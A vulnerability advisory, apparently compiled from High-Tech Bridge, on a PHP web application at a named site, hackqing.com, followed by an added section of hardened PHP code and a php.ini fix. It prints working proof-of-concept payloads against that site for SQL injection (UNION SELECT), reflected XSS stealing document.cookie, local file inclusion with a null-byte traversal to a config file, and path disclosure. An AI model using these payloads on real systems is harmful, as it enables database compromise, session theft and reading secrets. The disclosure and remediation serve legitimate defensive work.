This vulnerability exists in the "/index.php" script, where the "search" parameter is used without filtering. Attackers can modify the application's SQL statements, execute arbitrary queries against the database, compromise the application, access or modify sensitive data, or exploit further weaknesses in the underlying SQL database.
SQL injection:
PoC:
<form action="http://www.hackqing.com/index.php?id=14" method="post" name="main">
  <input type="hidden" name="search" value="pentest)/**/union/**/select/**/1,2,3,@version/**/#"/>
  <input type="submit" value="submit" name="submit"/>
</form>
XSS (cross-site scripting):
PoC:
http://www.hackqing.com/manager/index.php?location=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Local file inclusion:
This vulnerability exists in "/manager/actions/static/document_data.static.action.php", whose "id" parameter is used to build a file path without validation; remote users can read arbitrary local files.
PoC:
http://www.hackqing.com/manager/actions/static/document_data.static.action.php?id=/../shortdes/config.inc.php%00
Sensitive information leakage: physical path disclosure
The vulnerability exists in the "/manager/frames/3.php" script, which can be made to raise an error that reveals the script's full filesystem path. Remote users can thereby determine the full path of the web root directory and other potentially sensitive information.
PoC: http://www.hackqing.com/manager/frames/3.php
Source: High-Tech Bridge (compiled and edited)
Solution: filter (validate and sanitize) the affected inputs.
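As an added illustration of the solution above (example code written for this page, not from High-Tech Bridge or the affected application), the three affected inputs handled safely in PHP. The table and column names, the base directory and the function names are assumptions; the point is the pattern: a bound parameter instead of string concatenation for "search", HTML encoding for "location", and a numeric allow-list plus a realpath() containment check instead of a raw path for "id".

```php
<?php
// Added example (not from the original advisory or the affected product): hardened
// handling for the three input patterns the advisory describes. The schema
// (documents(id, title, description)) and the base directory are assumptions.

declare(strict_types=1);

// 1. SQL injection: bind the "search" value instead of concatenating it into SQL.
function searchDocuments(PDO $db, string $search): array
{
    // Two distinct placeholders: MySQL native prepares reject a reused named parameter.
    $stmt = $db->prepare(
        'SELECT id, title FROM documents WHERE title LIKE :t1 OR description LIKE :t2'
    );
    // Escape LIKE metacharacters so user input cannot become a wildcard scan.
    $term = '%' . addcslashes($search, '%_\\') . '%';
    $stmt->bindValue(':t1', $term, PDO::PARAM_STR);
    $stmt->bindValue(':t2', $term, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// 2. Reflected XSS: encode "location" before it is written into an HTML attribute.
function renderLocation(string $location): string
{
    return '<input type="hidden" name="location" value="'
        . htmlspecialchars($location, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '">';
}

// 3. Local file inclusion: never build a path from the raw "id". Require a short
// numeric id (rejects "../", null bytes, extensions) and resolve it against a fixed
// directory, then confirm the resolved path is still inside that directory.
function documentDataPath(string $id, string $baseDir): ?string
{
    if (!preg_match('/^[0-9]{1,10}\z/', $id)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $id . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}
```

For the path-disclosure issue, the corresponding configuration change is to stop sending PHP errors to the browser in production (display_errors = Off, log_errors = On in php.ini), so an induced error is recorded server-side instead of printing the script's full path to the client.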